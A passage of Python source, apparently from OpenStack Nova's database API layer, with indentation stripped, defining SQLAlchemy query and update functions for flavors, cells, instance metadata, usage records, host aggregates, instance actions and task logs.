specs_ref['value'] = v
specs_refs.append(specs_ref)
values['extra_specs'] = specs_refs
instance_type_ref = models.InstanceTypes()
instance_type_ref.update(values)
if projects is None:
projects = []
session = get_session()
with session.begin():
try:
instance_type_ref.save()
except db_exc.DBDuplicateEntry as e:
if 'flavorid' in e.columns:
raise exception.FlavorIdExists(flavor_id=values['flavorid'])
raise exception.FlavorExists(name=values['name'])
except Exception as e:
raise db_exc.DBError(e)
for project in set(projects):
access_ref = models.InstanceTypeProjects()
access_ref.update({"instance_type_id": instance_type_ref.id,
"project_id": project})
access_ref.save()
return _dict_with_extra_specs(instance_type_ref)
def _dict_with_extra_specs(inst_type_query):
"""Takes an instance or instance type query returned
by sqlalchemy and returns it as a dictionary, converting the
extra_specs entry from a list of dicts:
'extra_specs' : [{'key': 'k1', 'value': 'v1', ...}, ...]
to a single dict:
'extra_specs' : {'k1': 'v1'}
"""
inst_type_dict = dict(inst_type_query)
extra_specs = dict([(x['key'], x['value'])
for x in inst_type_query['extra_specs']])
inst_type_dict['extra_specs'] = extra_specs
return inst_type_dict
def _flavor_get_query(context, session=None, read_deleted=None):
query = model_query(context, models.InstanceTypes, session=session,
read_deleted=read_deleted).\
options(joinedload('extra_specs'))
if not context.is_admin:
the_filter = [models.InstanceTypes.is_public == True]
the_filter.extend([
models.InstanceTypes.projects.any(project_id=context.project_id)
])
query = query.filter(or_(*the_filter))
return query
@require_context
def flavor_get_all(context, inactive=False, filters=None,
sort_key='flavorid', sort_dir='asc', limit=None,
marker=None):
"""Returns all flavors.
"""
filters = filters or {}
# FIXME(sirp): now that we have the `disabled` field for flavors, we
# should probably remove the use of `deleted` to mark inactive. `deleted`
# should mean truly deleted, e.g. we can safely purge the record out of the
# database.
read_deleted = "yes" if inactive else "no"
sort_fn = {'desc': desc, 'asc': asc}
query = _flavor_get_query(context, read_deleted=read_deleted)
if 'min_memory_mb' in filters:
query = query.filter(
models.InstanceTypes.memory_mb >= filters['min_memory_mb'])
if 'min_root_gb' in filters:
query = query.filter(
models.InstanceTypes.root_gb >= filters['min_root_gb'])
if 'disabled' in filters:
query = query.filter(
models.InstanceTypes.disabled == filters['disabled'])
if 'is_public' in filters and filters['is_public'] is not None:
the_filter = [models.InstanceTypes.is_public == filters['is_public']]
if filters['is_public'] and context.project_id is not None:
the_filter.extend([
models.InstanceTypes.projects.any(
project_id=context.project_id, deleted=0)
])
if len(the_filter) > 1:
query = query.filter(or_(*the_filter))
else:
query = query.filter(the_filter[0])
marker_row = None
if marker is not None:
marker_row = _flavor_get_query(context, read_deleted=read_deleted).\
filter_by(flavorid=marker).\
first()
if not marker_row:
raise exception.MarkerNotFound(marker)
query = sqlalchemyutils.paginate_query(query, models.InstanceTypes, limit,
[sort_key, 'id'],
marker=marker_row,
sort_dir=sort_dir)
inst_types = query.all()
return [_dict_with_extra_specs(i) for i in inst_types]
def _flavor_get_id_from_flavor_query(context, flavor_id, session=None):
return model_query(context, models.InstanceTypes.id, read_deleted="no",
session=session, base_model=models.InstanceTypes).\
filter_by(flavorid=flavor_id)
def _flavor_get_id_from_flavor(context, flavor_id, session=None):
result = _flavor_get_id_from_flavor_query(context, flavor_id,
session=session).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=flavor_id)
return result[0]
@require_context
def flavor_get(context, id):
"""Returns a dict describing specific flavor."""
result = _flavor_get_query(context).\
filter_by(id=id).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=id)
return _dict_with_extra_specs(result)
@require_context
def flavor_get_by_name(context, name):
"""Returns a dict describing specific flavor."""
result = _flavor_get_query(context).\
filter_by(name=name).\
first()
if not result:
raise exception.FlavorNotFoundByName(flavor_name=name)
return _dict_with_extra_specs(result)
@require_context
def flavor_get_by_flavor_id(context, flavor_id, read_deleted):
"""Returns a dict describing specific flavor_id."""
result = _flavor_get_query(context, read_deleted=read_deleted).\
filter_by(flavorid=flavor_id).\
order_by(asc("deleted"), asc("id")).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=flavor_id)
return _dict_with_extra_specs(result)
@require_admin_context
def flavor_destroy(context, name):
"""Marks specific flavor as deleted."""
session = get_session()
with session.begin():
ref = model_query(context, models.InstanceTypes, session=session,
read_deleted="no").\
filter_by(name=name).\
first()
if not ref:
raise exception.FlavorNotFoundByName(flavor_name=name)
ref.soft_delete(session=session)
model_query(context, models.InstanceTypeExtraSpecs,
session=session, read_deleted="no").\
filter_by(instance_type_id=ref['id']).\
soft_delete()
model_query(context, models.InstanceTypeProjects,
session=session, read_deleted="no").\
filter_by(instance_type_id=ref['id']).\
soft_delete()
def _flavor_access_query(context, session=None):
return model_query(context, models.InstanceTypeProjects, session=session,
read_deleted="no")
@require_admin_context
def flavor_access_get_by_flavor_id(context, flavor_id):
"""Get flavor access list by flavor id."""
instance_type_id_subq = \
_flavor_get_id_from_flavor_query(context, flavor_id)
access_refs = _flavor_access_query(context).\
filter_by(instance_type_id=instance_type_id_subq).\
all()
return access_refs
@require_admin_context
def flavor_access_add(context, flavor_id, project_id):
"""Add given tenant to the flavor access list."""
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
access_ref = models.InstanceTypeProjects()
access_ref.update({"instance_type_id": instance_type_id,
"project_id": project_id})
try:
access_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.FlavorAccessExists(flavor_id=flavor_id,
project_id=project_id)
return access_ref
@require_admin_context
def flavor_access_remove(context, flavor_id, project_id):
"""Remove given tenant from the flavor access list."""
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
count = _flavor_access_query(context).\
filter_by(instance_type_id=instance_type_id).\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
if count == 0:
raise exception.FlavorAccessNotFound(flavor_id=flavor_id,
project_id=project_id)
def _flavor_extra_specs_get_query(context, flavor_id, session=None):
instance_type_id_subq = \
_flavor_get_id_from_flavor_query(context, flavor_id)
return model_query(context, models.InstanceTypeExtraSpecs, session=session,
read_deleted="no").\
filter_by(instance_type_id=instance_type_id_subq)
@require_context
def flavor_extra_specs_get(context, flavor_id):
rows = _flavor_extra_specs_get_query(context, flavor_id).all()
return dict([(row['key'], row['value']) for row in rows])
@require_context
def flavor_extra_specs_get_item(context, flavor_id, key):
result = _flavor_extra_specs_get_query(context, flavor_id).\
filter(models.InstanceTypeExtraSpecs.key == key).\
first()
if not result:
raise exception.FlavorExtraSpecsNotFound(
extra_specs_key=key, flavor_id=flavor_id)
return {result["key"]: result["value"]}
@require_context
def flavor_extra_specs_delete(context, flavor_id, key):
result = _flavor_extra_specs_get_query(context, flavor_id).\
filter(models.InstanceTypeExtraSpecs.key == key).\
soft_delete(synchronize_session=False)
# did not find the extra spec
if result == 0:
raise exception.FlavorExtraSpecsNotFound(
extra_specs_key=key, flavor_id=flavor_id)
@require_context
def flavor_extra_specs_update_or_create(context, flavor_id, specs,
max_retries=10):
for attempt in xrange(max_retries):
try:
session = get_session()
with session.begin():
instance_type_id = _flavor_get_id_from_flavor(context,
flavor_id, session)
spec_refs = model_query(context, models.InstanceTypeExtraSpecs,
session=session, read_deleted="no").\
filter_by(instance_type_id=instance_type_id).\
filter(models.InstanceTypeExtraSpecs.key.in_(specs.keys())).\
all()
existing_keys = set()
for spec_ref in spec_refs:
key = spec_ref["key"]
existing_keys.add(key)
spec_ref.update({"value": specs[key]})
for key, value in specs.iteritems():
if key in existing_keys:
continue
spec_ref = models.InstanceTypeExtraSpecs()
spec_ref.update({"key": key, "value": value,
"instance_type_id": instance_type_id})
session.add(spec_ref)
return specs
except db_exc.DBDuplicateEntry:
# a concurrent transaction has been committed,
# try again unless this was the last attempt
if attempt == max_retries - 1:
raise
####################
@require_admin_context
def cell_create(context, values):
cell = models.Cell()
cell.update(values)
try:
cell.save()
except db_exc.DBDuplicateEntry:
raise exception.CellExists(name=values['name'])
return cell
def _cell_get_by_name_query(context, cell_name, session=None):
return model_query(context, models.Cell,
session=session).filter_by(name=cell_name)
@require_admin_context
def cell_update(context, cell_name, values):
session = get_session()
with session.begin():
cell_query = _cell_get_by_name_query(context, cell_name,
session=session)
if not cell_query.update(values):
raise exception.CellNotFound(cell_name=cell_name)
cell = cell_query.first()
return cell
@require_admin_context
def cell_delete(context, cell_name):
return _cell_get_by_name_query(context, cell_name).soft_delete()
@require_admin_context
def cell_get(context, cell_name):
result = _cell_get_by_name_query(context, cell_name).first()
if not result:
raise exception.CellNotFound(cell_name=cell_name)
return result
@require_admin_context
def cell_get_all(context):
return model_query(context, models.Cell, read_deleted="no").all()
########################
# User-provided metadata
def _instance_metadata_get_multi(context, instance_uuids,
session=None, use_slave=False):
if not instance_uuids:
return []
return model_query(context, models.InstanceMetadata,
session=session, use_slave=use_slave).\
filter(
models.InstanceMetadata.instance_uuid.in_(instance_uuids))
def _instance_metadata_get_query(context, instance_uuid, session=None):
return model_query(context, models.InstanceMetadata, session=session,
read_deleted="no").\
filter_by(instance_uuid=instance_uuid)
@require_context
def instance_metadata_get(context, instance_uuid):
rows = _instance_metadata_get_query(context, instance_uuid).all()
return dict((row['key'], row['value']) for row in rows)
@require_context
@_retry_on_deadlock
def instance_metadata_delete(context, instance_uuid, key):
_instance_metadata_get_query(context, instance_uuid).\
filter_by(key=key).\
soft_delete()
@require_context
@_retry_on_deadlock
def instance_metadata_update(context, instance_uuid, metadata, delete):
all_keys = metadata.keys()
session = get_session()
with session.begin(subtransactions=True):
if delete:
_instance_metadata_get_query(context, instance_uuid,
session=session).\
filter(~models.InstanceMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = []
meta_refs = _instance_metadata_get_query(context, instance_uuid,
session=session).\
filter(models.InstanceMetadata.key.in_(all_keys)).\
all()
for meta_ref in meta_refs:
already_existing_keys.append(meta_ref.key)
meta_ref.update({"value": metadata[meta_ref.key]})
new_keys = set(all_keys) - set(already_existing_keys)
for key in new_keys:
meta_ref = models.InstanceMetadata()
meta_ref.update({"key": key, "value": metadata[key],
"instance_uuid": instance_uuid})
session.add(meta_ref)
return metadata
#######################
# System-owned metadata
def _instance_system_metadata_get_multi(context, instance_uuids,
session=None, use_slave=False):
if not instance_uuids:
return []
return model_query(context, models.InstanceSystemMetadata,
session=session, use_slave=use_slave).\
filter(
models.InstanceSystemMetadata.instance_uuid.in_(instance_uuids))
def _instance_system_metadata_get_query(context, instance_uuid, session=None):
return model_query(context, models.InstanceSystemMetadata,
session=session).\
filter_by(instance_uuid=instance_uuid)
@require_context
def instance_system_metadata_get(context, instance_uuid):
rows = _instance_system_metadata_get_query(context, instance_uuid).all()
return dict((row['key'], row['value']) for row in rows)
@require_context
def instance_system_metadata_update(context, instance_uuid, metadata, delete):
all_keys = metadata.keys()
session = get_session()
with session.begin(subtransactions=True):
if delete:
_instance_system_metadata_get_query(context, instance_uuid,
session=session).\
filter(~models.InstanceSystemMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = []
meta_refs = _instance_system_metadata_get_query(context, instance_uuid,
session=session).\
filter(models.InstanceSystemMetadata.key.in_(all_keys)).\
all()
for meta_ref in meta_refs:
already_existing_keys.append(meta_ref.key)
meta_ref.update({"value": metadata[meta_ref.key]})
new_keys = set(all_keys) - set(already_existing_keys)
for key in new_keys:
meta_ref = models.InstanceSystemMetadata()
meta_ref.update({"key": key, "value": metadata[key],
"instance_uuid": instance_uuid})
session.add(meta_ref)
return metadata
####################
@require_admin_context
def agent_build_create(context, values):
agent_build_ref = models.AgentBuild()
agent_build_ref.update(values)
try:
agent_build_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.AgentBuildExists(hypervisor=values['hypervisor'],
os=values['os'], architecture=values['architecture'])
return agent_build_ref
@require_admin_context
def agent_build_get_by_triple(context, hypervisor, os, architecture):
return model_query(context, models.AgentBuild, read_deleted="no").\
filter_by(hypervisor=hypervisor).\
filter_by(os=os).\
filter_by(architecture=architecture).\
first()
@require_admin_context
def agent_build_get_all(context, hypervisor=None):
if hypervisor:
return model_query(context, models.AgentBuild, read_deleted="no").\
filter_by(hypervisor=hypervisor).\
all()
else:
return model_query(context, models.AgentBuild, read_deleted="no").\
all()
@require_admin_context
def agent_build_destroy(context, agent_build_id):
rows_affected = model_query(context, models.AgentBuild).filter_by(
id=agent_build_id).soft_delete()
if rows_affected == 0:
raise exception.AgentBuildNotFound(id=agent_build_id)
@require_admin_context
def agent_build_update(context, agent_build_id, values):
rows_affected = model_query(context, models.AgentBuild).\
filter_by(id=agent_build_id).\
update(values)
if rows_affected == 0:
raise exception.AgentBuildNotFound(id=agent_build_id)
####################
@require_context
def bw_usage_get(context, uuid, start_period, mac, use_slave=False):
return model_query(context, models.BandwidthUsage, read_deleted="yes",
use_slave=use_slave).\
filter_by(start_period=start_period).\
filter_by(uuid=uuid).\
filter_by(mac=mac).\
first()
@require_context
def bw_usage_get_by_uuids(context, uuids, start_period):
return model_query(context, models.BandwidthUsage, read_deleted="yes").\
filter(models.BandwidthUsage.uuid.in_(uuids)).\
filter_by(start_period=start_period).\
all()
@require_context
@_retry_on_deadlock
def bw_usage_update(context, uuid, mac, start_period, bw_in, bw_out,
last_ctr_in, last_ctr_out, last_refreshed=None):
session = get_session()
if last_refreshed is None:
last_refreshed = timeutils.utcnow()
# NOTE(comstud): More often than not, we'll be updating records vs
# creating records. Optimize accordingly, trying to update existing
# records. Fall back to creation when no rows are updated.
with session.begin():
values = {'last_refreshed': last_refreshed,
'last_ctr_in': last_ctr_in,
'last_ctr_out': last_ctr_out,
'bw_in': bw_in,
'bw_out': bw_out}
rows = model_query(context, models.BandwidthUsage,
session=session, read_deleted="yes").\
filter_by(start_period=start_period).\
filter_by(uuid=uuid).\
filter_by(mac=mac).\
update(values, synchronize_session=False)
if rows:
return
bwusage = models.BandwidthUsage()
bwusage.start_period = start_period
bwusage.uuid = uuid
bwusage.mac = mac
bwusage.last_refreshed = last_refreshed
bwusage.bw_in = bw_in
bwusage.bw_out = bw_out
bwusage.last_ctr_in = last_ctr_in
bwusage.last_ctr_out = last_ctr_out
try:
bwusage.save(session=session)
except db_exc.DBDuplicateEntry:
# NOTE(sirp): Possible race if two greenthreads attempt to create
# the usage entry at the same time. First one wins.
pass
####################
@require_context
def vol_get_usage_by_time(context, begin):
"""Return volumes usage that have been updated after a specified time."""
return model_query(context, models.VolumeUsage, read_deleted="yes").\
filter(or_(models.VolumeUsage.tot_last_refreshed == None,
models.VolumeUsage.tot_last_refreshed > begin,
models.VolumeUsage.curr_last_refreshed == None,
models.VolumeUsage.curr_last_refreshed > begin,
)).\
all()
@require_context
def vol_usage_update(context, id, rd_req, rd_bytes, wr_req, wr_bytes,
instance_id, project_id, user_id, availability_zone,
update_totals=False):
session = get_session()
refreshed = timeutils.utcnow()
with session.begin():
values = {}
# NOTE(dricco): We will be mostly updating current usage records vs
# updating total or creating records. Optimize accordingly.
if not update_totals:
values = {'curr_last_refreshed': refreshed,
'curr_reads': rd_req,
'curr_read_bytes': rd_bytes,
'curr_writes': wr_req,
'curr_write_bytes': wr_bytes,
'instance_uuid': instance_id,
'project_id': project_id,
'user_id': user_id,
'availability_zone': availability_zone}
else:
values = {'tot_last_refreshed': refreshed,
'tot_reads': models.VolumeUsage.tot_reads + rd_req,
'tot_read_bytes': models.VolumeUsage.tot_read_bytes +
rd_bytes,
'tot_writes': models.VolumeUsage.tot_writes + wr_req,
'tot_write_bytes': models.VolumeUsage.tot_write_bytes +
wr_bytes,
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'instance_uuid': instance_id,
'project_id': project_id,
'user_id': user_id,
'availability_zone': availability_zone}
current_usage = model_query(context, models.VolumeUsage,
session=session, read_deleted="yes").\
filter_by(volume_id=id).\
first()
if current_usage:
if (rd_req < current_usage['curr_reads'] or
rd_bytes < current_usage['curr_read_bytes'] or
wr_req < current_usage['curr_writes'] or
wr_bytes < current_usage['curr_write_bytes']):
LOG.info(_("Volume(%s) has lower stats then what is in "
"the database. Instance must have been rebooted "
"or crashed. Updating totals.") % id)
if not update_totals:
values['tot_reads'] = (models.VolumeUsage.tot_reads +
current_usage['curr_reads'])
values['tot_read_bytes'] = (
models.VolumeUsage.tot_read_bytes +
current_usage['curr_read_bytes'])
values['tot_writes'] = (models.VolumeUsage.tot_writes +
current_usage['curr_writes'])
values['tot_write_bytes'] = (
models.VolumeUsage.tot_write_bytes +
current_usage['curr_write_bytes'])
else:
values['tot_reads'] = (models.VolumeUsage.tot_reads +
current_usage['curr_reads'] +
rd_req)
values['tot_read_bytes'] = (
models.VolumeUsage.tot_read_bytes +
current_usage['curr_read_bytes'] + rd_bytes)
values['tot_writes'] = (models.VolumeUsage.tot_writes +
current_usage['curr_writes'] +
wr_req)
values['tot_write_bytes'] = (
models.VolumeUsage.tot_write_bytes +
current_usage['curr_write_bytes'] + wr_bytes)
current_usage.update(values)
current_usage.save(session=session)
session.refresh(current_usage)
return current_usage
vol_usage = models.VolumeUsage()
vol_usage.volume_id = id
vol_usage.instance_uuid = instance_id
vol_usage.project_id = project_id
vol_usage.user_id = user_id
vol_usage.availability_zone = availability_zone
if not update_totals:
vol_usage.curr_last_refreshed = refreshed
vol_usage.curr_reads = rd_req
vol_usage.curr_read_bytes = rd_bytes
vol_usage.curr_writes = wr_req
vol_usage.curr_write_bytes = wr_bytes
else:
vol_usage.tot_last_refreshed = refreshed
vol_usage.tot_reads = rd_req
vol_usage.tot_read_bytes = rd_bytes
vol_usage.tot_writes = wr_req
vol_usage.tot_write_bytes = wr_bytes
vol_usage.save(session=session)
return vol_usage
####################
def s3_image_get(context, image_id):
"""Find local s3 image represented by the provided id."""
result = model_query(context, models.S3Image, read_deleted="yes").\
filter_by(id=image_id).\
first()
if not result:
raise exception.ImageNotFound(image_id=image_id)
return result
def s3_image_get_by_uuid(context, image_uuid):
"""Find local s3 image represented by the provided uuid."""
result = model_query(context, models.S3Image, read_deleted="yes").\
filter_by(uuid=image_uuid).\
first()
if not result:
raise exception.ImageNotFound(image_id=image_uuid)
return result
def s3_image_create(context, image_uuid):
"""Create local s3 image represented by provided uuid."""
try:
s3_image_ref = models.S3Image()
s3_image_ref.update({'uuid': image_uuid})
s3_image_ref.save()
except Exception as e:
raise db_exc.DBError(e)
return s3_image_ref
####################
def _aggregate_get_query(context, model_class, id_field=None, id=None,
session=None, read_deleted=None):
columns_to_join = {models.Aggregate: ['_hosts', '_metadata']}
query = model_query(context, model_class, session=session,
read_deleted=read_deleted)
for c in columns_to_join.get(model_class, []):
query = query.options(joinedload(c))
if id and id_field:
query = query.filter(id_field == id)
return query
def aggregate_create(context, values, metadata=None):
session = get_session()
query = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.name,
values['name'],
session=session,
read_deleted='no')
aggregate = query.first()
if not aggregate:
aggregate = models.Aggregate()
aggregate.update(values)
aggregate.save(session=session)
# We don't want these to be lazy loaded later. We know there is
# nothing here since we just created this aggregate.
aggregate._hosts = []
aggregate._metadata = []
else:
raise exception.AggregateNameExists(aggregate_name=values['name'])
if metadata:
aggregate_metadata_add(context, aggregate.id, metadata)
return aggregate_get(context, aggregate.id)
def aggregate_get(context, aggregate_id):
query = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id)
aggregate = query.first()
if not aggregate:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
return aggregate
def aggregate_get_by_host(context, host, key=None):
"""Return rows that match host (mandatory) and metadata key (optional).
:param host matches host, and is required.
:param key Matches metadata key, if not None.
"""
query = model_query(context, models.Aggregate)
query = query.options(joinedload('_hosts'))
query = query.options(joinedload('_metadata'))
query = query.join('_hosts')
query = query.filter(models.AggregateHost.host == host)
if key:
query = query.join("_metadata").filter(
models.AggregateMetadata.key == key)
return query.all()
def aggregate_metadata_get_by_host(context, host, key=None):
query = model_query(context, models.Aggregate)
query = query.join("_hosts")
query = query.join("_metadata")
query = query.filter(models.AggregateHost.host == host)
query = query.options(contains_eager("_metadata"))
if key:
query = query.filter(models.AggregateMetadata.key == key)
rows = query.all()
metadata = collections.defaultdict(set)
for agg in rows:
for kv in agg._metadata:
metadata[kv['key']].add(kv['value'])
return dict(metadata)
def aggregate_metadata_get_by_metadata_key(context, aggregate_id, key):
query = model_query(context, models.Aggregate)
query = query.join("_metadata")
query = query.filter(models.Aggregate.id == aggregate_id)
query = query.options(contains_eager("_metadata"))
query = query.filter(models.AggregateMetadata.key == key)
rows = query.all()
metadata = collections.defaultdict(set)
for agg in rows:
for kv in agg._metadata:
metadata[kv['key']].add(kv['value'])
return dict(metadata)
def aggregate_host_get_by_metadata_key(context, key):
query = model_query(context, models.Aggregate)
query = query.join("_metadata")
query = query.filter(models.AggregateMetadata.key == key)
query = query.options(contains_eager("_metadata"))
query = query.options(joinedload("_hosts"))
rows = query.all()
metadata = collections.defaultdict(set)
for agg in rows:
for agghost in agg._hosts:
metadata[agghost.host].add(agg._metadata[0]['value'])
return dict(metadata)
def aggregate_update(context, aggregate_id, values):
session = get_session()
if "name" in values:
aggregate_by_name = (_aggregate_get_query(context,
models.Aggregate,
models.Aggregate.name,
values['name'],
session=session,
read_deleted='no').first())
if aggregate_by_name and aggregate_by_name.id != aggregate_id:
# there is another aggregate with the new name
raise exception.AggregateNameExists(aggregate_name=values['name'])
aggregate = (_aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id,
session=session).first())
set_delete = True
if aggregate:
if "availability_zone" in values:
az = values.pop('availability_zone')
if 'metadata' not in values:
values['metadata'] = {'availability_zone': az}
set_delete = False
else:
values['metadata']['availability_zone'] = az
metadata = values.get('metadata')
if metadata is not None:
aggregate_metadata_add(context,
aggregate_id,
values.pop('metadata'),
set_delete=set_delete)
aggregate.update(values)
aggregate.save(session=session)
values['metadata'] = metadata
return aggregate_get(context, aggregate.id)
else:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
def aggregate_delete(context, aggregate_id):
session = get_session()
with session.begin():
count = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id,
session=session).\
soft_delete()
if count == 0:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
#Delete Metadata
model_query(context,
models.AggregateMetadata, session=session).\
filter_by(aggregate_id=aggregate_id).\
soft_delete()
def aggregate_get_all(context):
return _aggregate_get_query(context, models.Aggregate).all()
def _aggregate_metadata_get_query(context, aggregate_id, session=None,
read_deleted="yes"):
return model_query(context,
models.AggregateMetadata,
read_deleted=read_deleted,
session=session).\
filter_by(aggregate_id=aggregate_id)
@require_aggregate_exists
def aggregate_metadata_get(context, aggregate_id):
rows = model_query(context,
models.AggregateMetadata).\
filter_by(aggregate_id=aggregate_id).all()
return dict([(r['key'], r['value']) for r in rows])
@require_aggregate_exists
def aggregate_metadata_delete(context, aggregate_id, key):
count = _aggregate_get_query(context,
models.AggregateMetadata,
models.AggregateMetadata.aggregate_id,
aggregate_id).\
filter_by(key=key).\
soft_delete()
if count == 0:
raise exception.AggregateMetadataNotFound(aggregate_id=aggregate_id,
metadata_key=key)
@require_aggregate_exists
def aggregate_metadata_add(context, aggregate_id, metadata, set_delete=False,
max_retries=10):
all_keys = metadata.keys()
for attempt in xrange(max_retries):
try:
session = get_session()
with session.begin():
query = _aggregate_metadata_get_query(context, aggregate_id,
read_deleted='no',
session=session)
if set_delete:
query.filter(~models.AggregateMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
query = \
query.filter(models.AggregateMetadata.key.in_(all_keys))
already_existing_keys = set()
for meta_ref in query.all():
key = meta_ref.key
meta_ref.update({"value": metadata[key]})
already_existing_keys.add(key)
for key, value in metadata.iteritems():
if key in already_existing_keys:
continue
meta_ref = models.AggregateMetadata()
meta_ref.update({"key": key,
"value": value,
"aggregate_id": aggregate_id})
session.add(meta_ref)
return metadata
except db_exc.DBDuplicateEntry:
# a concurrent transaction has been committed,
# try again unless this was the last attempt
with excutils.save_and_reraise_exception() as ctxt:
if attempt < max_retries - 1:
ctxt.reraise = False
else:
msg = _("Add metadata failed for aggregate %(id)s after "
"%(retries)s retries") % {"id": aggregate_id,
"retries": max_retries}
LOG.warn(msg)
@require_aggregate_exists
def aggregate_host_get_all(context, aggregate_id):
rows = model_query(context,
models.AggregateHost).\
filter_by(aggregate_id=aggregate_id).all()
return [r.host for r in rows]
@require_aggregate_exists
def aggregate_host_delete(context, aggregate_id, host):
count = _aggregate_get_query(context,
models.AggregateHost,
models.AggregateHost.aggregate_id,
aggregate_id).\
filter_by(host=host).\
soft_delete()
if count == 0:
raise exception.AggregateHostNotFound(aggregate_id=aggregate_id,
host=host)
@require_aggregate_exists
def aggregate_host_add(context, aggregate_id, host):
host_ref = models.AggregateHost()
host_ref.update({"host": host, "aggregate_id": aggregate_id})
try:
host_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.AggregateHostExists(host=host,
aggregate_id=aggregate_id)
return host_ref
################
def instance_fault_create(context, values):
"""Create a new InstanceFault."""
fault_ref = models.InstanceFault()
fault_ref.update(values)
fault_ref.save()
return dict(fault_ref.iteritems())
def instance_fault_get_by_instance_uuids(context, instance_uuids):
"""Get all instance faults for the provided instance_uuids."""
if not instance_uuids:
return {}
rows = model_query(context, models.InstanceFault, read_deleted='no').\
filter(models.InstanceFault.instance_uuid.in_(
instance_uuids)).\
order_by(desc("created_at"), desc("id")).\
all()
output = {}
for instance_uuid in instance_uuids:
output[instance_uuid] = []
for row in rows:
data = dict(row.iteritems())
output[row['instance_uuid']].append(data)
return output
##################
def action_start(context, values):
convert_objects_related_datetimes(values, 'start_time')
action_ref = models.InstanceAction()
action_ref.update(values)
action_ref.save()
return action_ref
def action_finish(context, values):
convert_objects_related_datetimes(values, 'start_time', 'finish_time')
session = get_session()
with session.begin():
action_ref = model_query(context, models.InstanceAction,
session=session).\
filter_by(instance_uuid=values['instance_uuid']).\
filter_by(request_id=values['request_id']).\
first()
if not action_ref:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
action_ref.update(values)
return action_ref
def actions_get(context, instance_uuid):
"""Get all instance actions for the provided uuid."""
actions = model_query(context, models.InstanceAction).\
filter_by(instance_uuid=instance_uuid).\
order_by(desc("created_at"), desc("id")).\
all()
return actions
def action_get_by_request_id(context, instance_uuid, request_id):
"""Get the action by request_id and given instance."""
action = _action_get_by_request_id(context, instance_uuid, request_id)
return action
def _action_get_by_request_id(context, instance_uuid, request_id,
session=None):
result = model_query(context, models.InstanceAction, session=session).\
filter_by(instance_uuid=instance_uuid).\
filter_by(request_id=request_id).\
first()
return result
def action_event_start(context, values):
"""Start an event on an instance action."""
convert_objects_related_datetimes(values, 'start_time')
session = get_session()
with session.begin():
action = _action_get_by_request_id(context, values['instance_uuid'],
values['request_id'], session)
if not action:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
values['action_id'] = action['id']
event_ref = models.InstanceActionEvent()
event_ref.update(values)
session.add(event_ref)
return event_ref
def action_event_finish(context, values):
"""Finish an event on an instance action."""
convert_objects_related_datetimes(values, 'start_time', 'finish_time')
session = get_session()
with session.begin():
action = _action_get_by_request_id(context, values['instance_uuid'],
values['request_id'], session)
if not action:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
event_ref = model_query(context, models.InstanceActionEvent,
session=session).\
filter_by(action_id=action['id']).\
filter_by(event=values['event']).\
first()
if not event_ref:
raise exception.InstanceActionEventNotFound(action_id=action['id'],
event=values['event'])
event_ref.update(values)
if values['result'].lower() == 'error':
action.update({'message': 'Error'})
return event_ref
def action_events_get(context, action_id):
events = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action_id).\
order_by(desc("created_at"), desc("id")).\
all()
return events
def action_event_get_by_id(context, action_id, event_id):
event = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action_id).\
filter_by(id=event_id).\
first()
return event
##################
@require_context
def ec2_instance_create(context, instance_uuid, id=None):
"""Create ec2 compatible instance by provided uuid."""
ec2_instance_ref = models.InstanceIdMapping()
ec2_instance_ref.update({'uuid': instance_uuid})
if id is not None:
ec2_instance_ref.update({'id': id})
ec2_instance_ref.save()
return ec2_instance_ref
@require_context
def get_ec2_instance_id_by_uuid(context, instance_id):
result = _ec2_instance_get_query(context).\
filter_by(uuid=instance_id).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_id)
return result['id']
@require_context
def get_instance_uuid_by_ec2_id(context, ec2_id):
result = _ec2_instance_get_query(context).\
filter_by(id=ec2_id).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=ec2_id)
return result['uuid']
def _ec2_instance_get_query(context, session=None):
return model_query(context,
models.InstanceIdMapping,
session=session,
read_deleted='yes')
def _task_log_get_query(context, task_name, period_beginning,
period_ending, host=None, state=None, session=None):
query = model_query(context, models.TaskLog, session=session).\
filter_by(task_name=task_name).\
filter_by(period_beginning=period_beginning).\
filter_by(period_ending=period_ending)
if host is not None:
query = query.filter_by(host=host)
if state is not None:
query = query.filter_by(state=state)
return query
@require_admin_context
def task_log_get(context, task_name, period_beginning, period_ending, host,
state=None):
return _task_log_get_query(context, task_name, period_beginning,
period_ending, host, state).first()
@require_admin_context
def task_log_get_all(context, task_name, period_beginning, period_ending,
host=None, state=None):
return _task_log_get_query(context, task_name, period_beginning,
period_ending, host, state).all()
@require_admin_context
def task_log_begin_task(context, task_name, period_beginning, period_ending,
host, task_items=None, message=None):
task = models.TaskLog()
task.task_name = task_name
task.period_beginning = period_beginning
task.period_ending = period_ending
task.host = host
task.state = "RUNNING"
if message:
task.message = message
if task_items:
task.task_items = task_items
try:
task.save()
except db_exc.DBDuplicateEntry:
raise exception.TaskAlreadyRunning(task_name=task_name, host=host)
@require_admin_context
